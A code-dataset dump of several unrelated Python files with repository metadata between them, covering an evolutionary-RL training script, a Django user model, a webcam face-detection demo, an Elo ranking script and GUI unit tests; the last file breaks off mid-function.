def __repr__(self):
return "Set : "+str(self.dict.keys())
def add (self, value):
self.dict[value]=True
def contains(self, value):
return value in self.dict
def remove(self, value):
del self.dict[value]
s=Set([1,2,3])
s.add(4)
print s
print ("contains 5,",s.contains(5))
print ("contains 4,",s.contains(4))
s.remove(3)
print (s)
print ("contains 3,",s.contains(3))
| 274
| -11
| 156
|
6cf265d72ec069ba1c8f2f1dcab4bda48de2e36a
| 4,638
|
py
|
Python
|
bevodevo/train.py
|
riveSunder/bevodevo
|
d45ec97b825489a9e94f79843e7169daa9491264
|
[
"MIT"
] | 4
|
2020-12-02T22:28:29.000Z
|
2020-12-28T05:42:06.000Z
|
bevodevo/train.py
|
riveSunder/bevodevo
|
d45ec97b825489a9e94f79843e7169daa9491264
|
[
"MIT"
] | 5
|
2020-12-27T16:43:42.000Z
|
2021-11-11T21:00:15.000Z
|
bevodevo/train.py
|
riveSunder/bevodevo
|
d45ec97b825489a9e94f79843e7169daa9491264
|
[
"MIT"
] | null | null | null |
import os
import sys
import argparse
import subprocess
import torch
import numpy as np
import time
import gym
import pybullet
import pybullet_envs
from mpi4py import MPI
comm = MPI.COMM_WORLD
from bevodevo.policies.rnns import GatedRNNPolicy
from bevodevo.policies.cnns import ImpalaCNNPolicy
from bevodevo.policies.mlps import MLPPolicy, CPPNMLPPolicy, CPPNHebbianMLP,\
HebbianMLP, ABCHebbianMLP, HebbianMetaMLP, ABCHebbianMetaMLP
from bevodevo.algos.es import ESPopulation, ConstrainedESPopulation
from bevodevo.algos.cmaes import CMAESPopulation
from bevodevo.algos.pges import PGESPopulation
from bevodevo.algos.nes import NESPopulation
from bevodevo.algos.ga import GeneticPopulation
from bevodevo.algos.random_search import RandomSearch
#from bevodevo.algos.vpg import VanillaPolicyGradient
#from bevodevo.algos.dqn import DQN
if __name__ == "__main__":
parser = argparse.ArgumentParser("Experiment parameters")
parser.add_argument("-n", "--env_name", type=str, \
help="name of environemt", default="InvertedPendulumBulletEnv-v0")
parser.add_argument("-p", "--population_size", type=int,\
help="number of individuals in population", default=64)
parser.add_argument("-w", "--num_workers", type=int,\
help="number of cpu thread workers", default=0)
parser.add_argument("-a", "--algorithm", type=str,\
help="name of es learning algo", default="ESPopulation")
parser.add_argument("-pi", "--policy", type=str,\
help="name of policy architecture", default="MLPPolicy")
parser.add_argument("-g", "--generations", type=int,\
help="number of generations", default=50)
parser.add_argument("-t", "--performance_threshold", type=float,\
help="performance threshold to use for early stopping", default=float("Inf"))
parser.add_argument("-x", "--exp_name", type=str, \
help="name of experiment", default="temp_exp")
parser.add_argument("-s", "--seeds", type=int, nargs="+", default=42,\
help="seed for initializing pseudo-random number generator")
args = parser.parse_args()
if "BalanceBot" in args.env_name \
or "Duck" in args.env_name \
or "Cube" in args.env_name \
or "Sphere" in args.enve_name:
import open_safety.envs
if "-v" not in args.env_name:
args.env_name += "-v0"
if type(args.seeds) is not list:
args.seeds = [args.seeds]
train(args)
| 34.102941
| 89
| 0.681975
|
import os
import sys
import argparse
import subprocess
import torch
import numpy as np
import time
import gym
import pybullet
import pybullet_envs
from mpi4py import MPI
comm = MPI.COMM_WORLD
from bevodevo.policies.rnns import GatedRNNPolicy
from bevodevo.policies.cnns import ImpalaCNNPolicy
from bevodevo.policies.mlps import MLPPolicy, CPPNMLPPolicy, CPPNHebbianMLP,\
HebbianMLP, ABCHebbianMLP, HebbianMetaMLP, ABCHebbianMetaMLP
from bevodevo.algos.es import ESPopulation, ConstrainedESPopulation
from bevodevo.algos.cmaes import CMAESPopulation
from bevodevo.algos.pges import PGESPopulation
from bevodevo.algos.nes import NESPopulation
from bevodevo.algos.ga import GeneticPopulation
from bevodevo.algos.random_search import RandomSearch
#from bevodevo.algos.vpg import VanillaPolicyGradient
#from bevodevo.algos.dqn import DQN
def train(argv):
# env_name, generations, population_size,
if "gatedrnn" in argv.policy.lower():
policy_fn = GatedRNNPolicy
argv.policy = "GatedRNNPolicy"
elif "impala" in argv.policy.lower():
policy_fn = ImpalaCNNPolicy
argv.policy = "ImpalaCNNPolicy"
elif "cppnmlp" in argv.policy.lower():
policy_fn = CPPNMLPPolicy
arg.policy = "CPPNMLPPolicy"
elif "abchebbianmlp" in argv.policy.lower():
policy_fn = ABCHebbianMLP
argv.policy = "ABCHebbianMLP"
elif "abchebbianmetamlp" in argv.policy.lower():
policy_fn = ABCHebbianMetaMLP
argv.policy = "ABCHebbianMetaMLP"
elif "cppnhebbianmlp" in argv.policy.lower():
policy_fn = CPPNHebbianMLP
argv.policy = "CPPNHebbianMLP"
elif "hebbianmlp" in argv.policy.lower():
policy_fn = HebbianMLP
argv.policy = "HebbianMLP"
elif "hebbianmetamlp" in argv.policy.lower():
policy_fn = HebbianMetaMLP
argv.policy = "HebbianMetaMLP"
elif "mlppolicy" in argv.policy.lower():
policy_fn = MLPPolicy
argv.policy = "MLPPolicy"
else:
assert False, "policy not found, check spelling?"
if "ConstrainedESPopulation" == argv.algorithm:
population_fn = ConstrainedESPopulation
elif "ESPopulation" == argv.algorithm:
population_fn = ESPopulation
elif "CMAESPopulation" == argv.algorithm:
population_fn = CMAESPopulation
elif "Genetic" in argv.algorithm:
population_fn = GeneticPopulation
elif "PGES" in argv.algorithm:
population_fn = PGESPopulation
elif "NES" in argv.algorithm:
population_fn = NESPopulation
elif "dqn" in argv.algorithm:
population_fn = DQN
elif "vpg" in argv.algorithm.lower():
population_fn = VanillaPolicyGradient
elif "andom" in argv.algorithm:
population_fn = RandomSearch
else:
assert False, "population algo not found, check spelling?"
num_workers = argv.num_workers
population = population_fn(policy_fn, num_workers=num_workers)
population.train(argv)
if __name__ == "__main__":
parser = argparse.ArgumentParser("Experiment parameters")
parser.add_argument("-n", "--env_name", type=str, \
help="name of environemt", default="InvertedPendulumBulletEnv-v0")
parser.add_argument("-p", "--population_size", type=int,\
help="number of individuals in population", default=64)
parser.add_argument("-w", "--num_workers", type=int,\
help="number of cpu thread workers", default=0)
parser.add_argument("-a", "--algorithm", type=str,\
help="name of es learning algo", default="ESPopulation")
parser.add_argument("-pi", "--policy", type=str,\
help="name of policy architecture", default="MLPPolicy")
parser.add_argument("-g", "--generations", type=int,\
help="number of generations", default=50)
parser.add_argument("-t", "--performance_threshold", type=float,\
help="performance threshold to use for early stopping", default=float("Inf"))
parser.add_argument("-x", "--exp_name", type=str, \
help="name of experiment", default="temp_exp")
parser.add_argument("-s", "--seeds", type=int, nargs="+", default=42,\
help="seed for initializing pseudo-random number generator")
args = parser.parse_args()
if "BalanceBot" in args.env_name \
or "Duck" in args.env_name \
or "Cube" in args.env_name \
or "Sphere" in args.enve_name:
import open_safety.envs
if "-v" not in args.env_name:
args.env_name += "-v0"
if type(args.seeds) is not list:
args.seeds = [args.seeds]
train(args)
| 2,117
| 0
| 23
|
305281d1d65e2e36d46180f95ea3d6692aa1c5ca
| 366
|
py
|
Python
|
prediction/models.py
|
WaruiAlfred/ail_predict
|
8d406e802394d45f4d22039e1d91c695fe8e069f
|
[
"MIT"
] | null | null | null |
prediction/models.py
|
WaruiAlfred/ail_predict
|
8d406e802394d45f4d22039e1d91c695fe8e069f
|
[
"MIT"
] | null | null | null |
prediction/models.py
|
WaruiAlfred/ail_predict
|
8d406e802394d45f4d22039e1d91c695fe8e069f
|
[
"MIT"
] | null | null | null |
# from django.db import models
from django.contrib.auth.models import AbstractUser
from django.db import models
# Create your models here.
| 40.666667
| 83
| 0.803279
|
# from django.db import models
from django.contrib.auth.models import AbstractUser
from django.db import models
# Create your models here.
class User(AbstractUser):
is_admin = models.BooleanField('Admin',default=False)
is_patient = models.BooleanField('Patient',default=False)
is_health_practitioner = models.BooleanField('Health practitioner',default=False)
| 0
| 205
| 22
|
b0f91056a6c368409caf0a5fb324e79cfc59388f
| 2,262
|
py
|
Python
|
demos/demo_face_detection.py
|
rflamary/demos
|
af330563f5642d8435fa62641389b530a8396fc7
|
[
"MIT"
] | 25
|
2020-03-14T22:01:30.000Z
|
2021-10-05T13:50:02.000Z
|
demos/demo_face_detection.py
|
rflamary/demos
|
af330563f5642d8435fa62641389b530a8396fc7
|
[
"MIT"
] | null | null | null |
demos/demo_face_detection.py
|
rflamary/demos
|
af330563f5642d8435fa62641389b530a8396fc7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 Rémi Flamary
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import numpy as np
import cv2
import os
path_classif=os.path.dirname(__file__)+'/../data/models/haarcascade_frontalface_default.xml'
cam=os.getenv("CAMERA")
if cam is None:
cap = cv2.VideoCapture(0)
else:
cap = cv2.VideoCapture(int(cam))
face_cascade = cv2.CascadeClassifier(path_classif)
#screenshot index index
idscreen=0
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
img=frame
# apply detector
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# print rectangles for detected faces
for (x,y,w,h) in faces:
img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
# Display the resulting frame
cv2.imshow('Face detection',img)
key=cv2.waitKey(1)
if (key & 0xFF) in [ ord('q')]:
break
if (key & 0xFF) in [ ord('s')]:
cv2.imwrite("screen_{}.png".format(idscreen),img*255)
idscreen+=1
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| 29
| 92
| 0.716622
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2020 Rémi Flamary
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import numpy as np
import cv2
import os
path_classif=os.path.dirname(__file__)+'/../data/models/haarcascade_frontalface_default.xml'
cam=os.getenv("CAMERA")
if cam is None:
cap = cv2.VideoCapture(0)
else:
cap = cv2.VideoCapture(int(cam))
face_cascade = cv2.CascadeClassifier(path_classif)
#screenshot index index
idscreen=0
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
img=frame
# apply detector
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# print rectangles for detected faces
for (x,y,w,h) in faces:
img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = img[y:y+h, x:x+w]
# Display the resulting frame
cv2.imshow('Face detection',img)
key=cv2.waitKey(1)
if (key & 0xFF) in [ ord('q')]:
break
if (key & 0xFF) in [ ord('s')]:
cv2.imwrite("screen_{}.png".format(idscreen),img*255)
idscreen+=1
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| 0
| 0
| 0
|
4a1f4f3d91982d2ea80d4f5e58037fd0d77bdd1f
| 2,571
|
py
|
Python
|
calculateRanking.py
|
ConorMaley/Catan
|
c16f1a1d1eb286b13322a8b50ef319dd079ef01c
|
[
"Apache-2.0"
] | null | null | null |
calculateRanking.py
|
ConorMaley/Catan
|
c16f1a1d1eb286b13322a8b50ef319dd079ef01c
|
[
"Apache-2.0"
] | null | null | null |
calculateRanking.py
|
ConorMaley/Catan
|
c16f1a1d1eb286b13322a8b50ef319dd079ef01c
|
[
"Apache-2.0"
] | null | null | null |
import googleSheetsApi
import eloCalculator
if __name__ == '__main__':
main()
| 30.975904
| 132
| 0.614936
|
import googleSheetsApi
import eloCalculator
def main():
masterSheet = googleSheetsApi.getMasterSheet()
Elos = {}
playersArray = []
highestELO = {}
highestELO['score'] = 1200
lowestELO = {}
lowestELO['score'] = 1200
for line_count, row in enumerate(masterSheet):
if line_count == 0:
for name in row[1:]:
Elos[name] = 1200
playersArray.append(name)
# print(f'Column names are {", ".join(row)}')
else:
Gamescore = {}
OldElos = {}
for index, score in enumerate(row[1:]):
if score == '':
score = 0
if int(score) >= 2:
Gamescore[playersArray[index]] = score
OldElos[playersArray[index]] = Elos[playersArray[index]]
for index, (player, score) in enumerate(Gamescore.items()):
scoreChange = 0
for jindex, (opp, oppScore) in enumerate(Gamescore.items()):
if index != jindex:
if int(score) > int(oppScore):
status = 1
elif int(score) == int(oppScore):
status = 0.5
else:
status = 0
# print(f'{status} = status')
# K is constant for now
tempSC = eloCalculator.CalcEloChange(Elos[player], OldElos[opp], 30, status)
# print(f'{player} {Elos[player]} scored {score}, Opponent {opp} {OldElos[opp]} scored {oppScore}, change to player {tempSC}')
scoreChange += tempSC
# print(f'{player} scoreChange = {scoreChange}')
Elos[player] += round(scoreChange, 2)
# print(f'=============ELO after {line_count} games=============')
for name in sorted(Elos, key=Elos.get, reverse=True):
# not very efficient
if Elos[name] > highestELO['score']:
highestELO['score'] = Elos[name]
highestELO['player'] = name
highestELO['game'] = line_count
elif Elos[name] < lowestELO['score']:
lowestELO['score'] = Elos[name]
lowestELO['player'] = name
lowestELO['game'] = line_count
# print(f'{name}: {Elos[name]}')
# print(f'{sorted( ((name, score) for score, name in Elos.items()), reverse=True)}')
# newScore = '{} : {}'.format(name, score) for score, name in Elos.items() }
# print(f'{newScore}')
# print(f'Game {line_count} {repr(Elos.items())}')
#todo: write to rankings in google sheet
# for avg, val in enumerate(Elos):
# avg += Elos[val]
# print(f'{val}: {Elos[val]}')
# avg = avg/len(Elos)
# print(f'Avg Elo: {avg}')
# Final rankings
print('=============Final ELO count=============')
print(f'Highest ELO: {highestELO}')
print(f'Lowest ELO: {lowestELO}')
for name in sorted(Elos, key=Elos.get, reverse=True):
print(f'{name}: {Elos[name]}')
if __name__ == '__main__':
main()
| 2,466
| 0
| 23
|
c32342487ddf2e42cf5a098bcc493400e3bb3c02
| 1,211
|
py
|
Python
|
tests/workflows/test_cli_parser.py
|
akrherz/pyWWA
|
011526f459db00d117e59f570535ac42ca267d83
|
[
"MIT"
] | 9
|
2015-03-27T22:43:07.000Z
|
2020-04-10T04:19:47.000Z
|
tests/workflows/test_cli_parser.py
|
akrherz/pyWWA
|
011526f459db00d117e59f570535ac42ca267d83
|
[
"MIT"
] | 76
|
2015-03-05T18:20:07.000Z
|
2022-03-24T02:04:25.000Z
|
tests/workflows/test_cli_parser.py
|
akrherz/pyWWA
|
011526f459db00d117e59f570535ac42ca267d83
|
[
"MIT"
] | 3
|
2020-11-05T17:38:03.000Z
|
2022-03-04T17:39:40.000Z
|
"""Test cli_parser."""
# 3rd Party
from pyiem.util import utc
import pytest
# Local
import pywwa
from pywwa.workflows import cli_parser
from pywwa.testing import get_example_file
@pytest.mark.parametrize("database", ["iem"])
def test_processor(cursor):
"""Test basic parsing."""
data = get_example_file("CLI.txt")
pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
prod = cli_parser.processor(cursor, data)
assert prod.valid == pywwa.CTX.utcnow
@pytest.mark.parametrize("database", ["iem"])
def test_two_clis(cursor):
"""Test parsing ye infamous double CLI."""
cursor.execute(
"select max_tmpf from summary_2014 s JOIN stations t "
"on (s.iemid = t.iemid) WHERE t.id in ('HOU', 'IAH') "
"and day = '2014-11-30'"
)
data = get_example_file("CLIHOU.txt")
prod = cli_parser.processor(cursor, data)
assert len(prod.data) == 2
@pytest.mark.parametrize("database", ["iem"])
def test_bad_station(cursor):
"""Test what happens when we have an unknown station."""
data = get_example_file("CLI.txt").replace("CLIFGF", "CLIXXX")
pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
prod = cli_parser.processor(cursor, data)
assert prod is not None
| 29.536585
| 66
| 0.672998
|
"""Test cli_parser."""
# 3rd Party
from pyiem.util import utc
import pytest
# Local
import pywwa
from pywwa.workflows import cli_parser
from pywwa.testing import get_example_file
@pytest.mark.parametrize("database", ["iem"])
def test_processor(cursor):
"""Test basic parsing."""
data = get_example_file("CLI.txt")
pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
prod = cli_parser.processor(cursor, data)
assert prod.valid == pywwa.CTX.utcnow
@pytest.mark.parametrize("database", ["iem"])
def test_two_clis(cursor):
"""Test parsing ye infamous double CLI."""
cursor.execute(
"select max_tmpf from summary_2014 s JOIN stations t "
"on (s.iemid = t.iemid) WHERE t.id in ('HOU', 'IAH') "
"and day = '2014-11-30'"
)
data = get_example_file("CLIHOU.txt")
prod = cli_parser.processor(cursor, data)
assert len(prod.data) == 2
@pytest.mark.parametrize("database", ["iem"])
def test_bad_station(cursor):
"""Test what happens when we have an unknown station."""
data = get_example_file("CLI.txt").replace("CLIFGF", "CLIXXX")
pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
prod = cli_parser.processor(cursor, data)
assert prod is not None
| 0
| 0
| 0
|
0711d2b2079f706e4f95d3bb4d7821e8f97ba680
| 354
|
py
|
Python
|
src/modules/services/interfaces/health.py
|
periket2000/zookeeperize
|
3e72337643b60984b3ad8c206088ea6ea18b0206
|
[
"Apache-2.0"
] | null | null | null |
src/modules/services/interfaces/health.py
|
periket2000/zookeeperize
|
3e72337643b60984b3ad8c206088ea6ea18b0206
|
[
"Apache-2.0"
] | null | null | null |
src/modules/services/interfaces/health.py
|
periket2000/zookeeperize
|
3e72337643b60984b3ad8c206088ea6ea18b0206
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Metaclass as interface for the health service
"""
from abc import ABCMeta, abstractmethod
| 19.666667
| 45
| 0.621469
|
# -*- coding: utf-8 -*-
"""
Metaclass as interface for the health service
"""
from abc import ABCMeta, abstractmethod
class HealthInterface(metaclass=ABCMeta):
@abstractmethod
def process(self, salute=None):
"""
Health interface
:salute: the salute to the system
:return: Json response
"""
pass
| 0
| 211
| 23
|
05a56b2d9163eb6470a1531a5bcf0049c9a4bd4b
| 173
|
py
|
Python
|
course_api/routing.py
|
dragonbone81/bobcat-courses-backend
|
d0f98b837f37eb16a89a24ce9bd3f3f0fd52064c
|
[
"MIT"
] | 3
|
2018-10-25T12:41:33.000Z
|
2019-09-19T19:47:39.000Z
|
course_api/routing.py
|
dragonbone81/bobcat-courses-backend
|
d0f98b837f37eb16a89a24ce9bd3f3f0fd52064c
|
[
"MIT"
] | 22
|
2018-04-01T02:43:01.000Z
|
2022-03-11T23:15:55.000Z
|
course_api/routing.py
|
dragonbone81/cse120
|
d0f98b837f37eb16a89a24ce9bd3f3f0fd52064c
|
[
"MIT"
] | 1
|
2019-09-19T19:48:59.000Z
|
2019-09-19T19:48:59.000Z
|
# chat/routing.py
from django.conf.urls import url
from . import consumers
websocket_urlpatterns = [
url(r'^api/ws/notifications', consumers.NotificationsConsumer),
]
| 19.222222
| 67
| 0.763006
|
# chat/routing.py
from django.conf.urls import url
from . import consumers
websocket_urlpatterns = [
url(r'^api/ws/notifications', consumers.NotificationsConsumer),
]
| 0
| 0
| 0
|
609b8d6d6afdd31120e91ceaa06afaea06a3515a
| 14,668
|
py
|
Python
|
force_wfmanager/tests/test_wfmanager_tasks.py
|
force-h2020/force-wfmanager
|
bcd488cd37092cacd9d0c81b544ee8c1654d1d92
|
[
"BSD-2-Clause"
] | 1
|
2019-08-19T16:02:20.000Z
|
2019-08-19T16:02:20.000Z
|
force_wfmanager/tests/test_wfmanager_tasks.py
|
force-h2020/force-wfmanager
|
bcd488cd37092cacd9d0c81b544ee8c1654d1d92
|
[
"BSD-2-Clause"
] | 396
|
2017-07-18T15:19:55.000Z
|
2021-05-03T06:23:06.000Z
|
force_wfmanager/tests/test_wfmanager_tasks.py
|
force-h2020/force-wfmanager
|
bcd488cd37092cacd9d0c81b544ee8c1654d1d92
|
[
"BSD-2-Clause"
] | 2
|
2019-03-05T16:23:10.000Z
|
2020-04-16T08:59:11.000Z
|
# (C) Copyright 2010-2020 Enthought, Inc., Austin, TX
# All rights reserved.
import copy
from unittest import mock, TestCase
from pyface.api import OK, CANCEL
from pyface.file_dialog import FileDialog
from pyface.ui.qt4.util.gui_test_assistant import GuiTestAssistant
from pyface.tasks.api import TaskWindow
from force_bdss.tests.probe_classes.factory_registry import (
ProbeFactoryRegistry,
)
from force_bdss.api import Workflow
from force_wfmanager.tests.dummy_classes.dummy_contributed_ui import (
DummyContributedUI,
)
from force_wfmanager.ui.review.data_view_pane import DataViewPane
from force_wfmanager.ui.setup.setup_pane import SetupPane
from force_wfmanager.ui.setup.side_pane import SidePane
from force_wfmanager.ui.review.results_pane import ResultsPane
from force_wfmanager.model.analysis_model import AnalysisModel
from .mock_methods import mock_file_writer, mock_dialog, mock_return_args
from force_wfmanager.tests.dummy_classes.dummy_wfmanager import DummyWfManager
from force_wfmanager.wfmanager_review_task import WfManagerReviewTask
from force_wfmanager.wfmanager_setup_task import WfManagerSetupTask
FILE_DIALOG_PATH = "force_wfmanager.wfmanager_setup_task.FileDialog"
RESULTS_FILE_DIALOG_PATH = "force_wfmanager.wfmanager_review_task.FileDialog"
RESULTS_FILE_OPEN_PATH = "force_wfmanager.io.project_io.open"
RESULTS_JSON_DUMP_PATH = "force_wfmanager.io.project_io.json.dump"
RESULTS_JSON_LOAD_PATH = "force_wfmanager.io.project_io.json.load"
RESULTS_WRITER_PATH = (
"force_wfmanager.io.project_io.WorkflowWriter.get_workflow_data"
)
RESULTS_READER_PATH = "force_wfmanager.io.project_io.WorkflowReader"
RESULTS_ERROR_PATH = "force_wfmanager.wfmanager_review_task.error"
ANALYSIS_WRITE_PATH = (
"force_wfmanager.io.analysis_model_io.write_analysis_model"
)
ANALYSIS_FILE_OPEN_PATH = "force_wfmanager.model.analysis_model.open"
| 37.804124
| 79
| 0.650123
|
# (C) Copyright 2010-2020 Enthought, Inc., Austin, TX
# All rights reserved.
import copy
from unittest import mock, TestCase
from pyface.api import OK, CANCEL
from pyface.file_dialog import FileDialog
from pyface.ui.qt4.util.gui_test_assistant import GuiTestAssistant
from pyface.tasks.api import TaskWindow
from force_bdss.tests.probe_classes.factory_registry import (
ProbeFactoryRegistry,
)
from force_bdss.api import Workflow
from force_wfmanager.tests.dummy_classes.dummy_contributed_ui import (
DummyContributedUI,
)
from force_wfmanager.ui.review.data_view_pane import DataViewPane
from force_wfmanager.ui.setup.setup_pane import SetupPane
from force_wfmanager.ui.setup.side_pane import SidePane
from force_wfmanager.ui.review.results_pane import ResultsPane
from force_wfmanager.model.analysis_model import AnalysisModel
from .mock_methods import mock_file_writer, mock_dialog, mock_return_args
from force_wfmanager.tests.dummy_classes.dummy_wfmanager import DummyWfManager
from force_wfmanager.wfmanager_review_task import WfManagerReviewTask
from force_wfmanager.wfmanager_setup_task import WfManagerSetupTask
FILE_DIALOG_PATH = "force_wfmanager.wfmanager_setup_task.FileDialog"
RESULTS_FILE_DIALOG_PATH = "force_wfmanager.wfmanager_review_task.FileDialog"
RESULTS_FILE_OPEN_PATH = "force_wfmanager.io.project_io.open"
RESULTS_JSON_DUMP_PATH = "force_wfmanager.io.project_io.json.dump"
RESULTS_JSON_LOAD_PATH = "force_wfmanager.io.project_io.json.load"
RESULTS_WRITER_PATH = (
"force_wfmanager.io.project_io.WorkflowWriter.get_workflow_data"
)
RESULTS_READER_PATH = "force_wfmanager.io.project_io.WorkflowReader"
RESULTS_ERROR_PATH = "force_wfmanager.wfmanager_review_task.error"
ANALYSIS_WRITE_PATH = (
"force_wfmanager.io.analysis_model_io.write_analysis_model"
)
ANALYSIS_FILE_OPEN_PATH = "force_wfmanager.model.analysis_model.open"
def get_probe_wfmanager_tasks(wf_manager=None, contributed_uis=None):
# Returns the Setup and Review Tasks, with a mock TaskWindow and dummy
# Application which does not have an event loop.
if wf_manager is None:
wf_manager = DummyWfManager()
analysis_model = AnalysisModel()
workflow_model = Workflow()
factory_registry_plugin = ProbeFactoryRegistry()
if contributed_uis is None:
contributed_uis = [DummyContributedUI()]
wf_manager.factory_registry = factory_registry_plugin
setup_test = WfManagerSetupTask(
analysis_model=analysis_model,
workflow_model=workflow_model,
factory_registry=factory_registry_plugin,
contributed_uis=contributed_uis,
)
review_task = WfManagerReviewTask(
analysis_model=analysis_model,
workflow_model=workflow_model,
factory_registry=factory_registry_plugin,
)
tasks = [setup_test, review_task]
mock_window = mock.Mock(spec=TaskWindow)
mock_window.tasks = tasks
mock_window.application = wf_manager
for task in tasks:
task.window = mock_window
task.create_central_pane()
# A Task's central pane is generally aware of its task in normal
# operations, but it doesn't seem to be so in this mock situation;
# so we "make" it aware.
if hasattr(task, "central_pane") and task.central_pane is not None:
task.central_pane.task = task
task.create_dock_panes()
return tasks[0], tasks[1]
def return_workflow(file_path):
return Workflow()
class TestWFManagerTasks(GuiTestAssistant, TestCase):
def setUp(self):
super(TestWFManagerTasks, self).setUp()
self.setup_task, self.review_task = get_probe_wfmanager_tasks()
def test_init(self):
self.assertIsInstance(self.setup_task.create_central_pane(), SetupPane)
self.assertEqual(len(self.setup_task.create_dock_panes()), 1)
self.assertIsInstance(self.setup_task.side_pane, SidePane)
self.assertEqual(len(self.review_task.create_dock_panes()), 1)
self.assertIsInstance(self.review_task.side_pane, ResultsPane)
self.assertIsInstance(
self.review_task.create_central_pane(), DataViewPane
)
self.assertIsInstance(self.review_task.workflow_model, Workflow)
self.assertIsInstance(self.setup_task.workflow_model, Workflow)
self.assertIsInstance(self.review_task.analysis_model, AnalysisModel)
self.assertIsInstance(self.setup_task.analysis_model, AnalysisModel)
def test_save_analysis(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
):
mock_file_dialog.side_effect = mock_dialog(
FileDialog, OK, "test_file.json"
)
self.review_task.analysis_model._export_enabled = True
self.assertTrue(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertTrue(mock_open.called)
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
):
mock_file_dialog.side_effect = mock_dialog(
FileDialog, OK, "test_file.csv"
)
self.assertTrue(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertTrue(mock_open.called)
def test_save_analysis_failure(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, CANCEL)
self.assertFalse(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertFalse(mock_open.called)
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
), mock.patch(
RESULTS_ERROR_PATH
) as mock_error:
mock_error.side_effect = mock_return_args
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK, "")
self.review_task.analysis_model._export_enabled = True
self.assertFalse(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertFalse(mock_open.called)
mock_error.assert_called_with(
None,
(
"Cannot save in the requested file:\n\n"
"AnalysisModel can only write to .json or .csv formats."
),
"Error when saving the results table",
)
mock_open = mock.mock_open()
mock_open.side_effect = RuntimeError("OUPS")
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
), mock.patch(
RESULTS_ERROR_PATH
) as mock_error:
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK, "f.csv")
self.assertFalse(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertTrue(mock_open.called)
mock_error.assert_called_with(
None,
"Cannot save the results table:\n\nOUPS",
"Error when saving results",
)
def test_save_project(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_JSON_DUMP_PATH
) as mock_json_dump, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
), mock.patch(
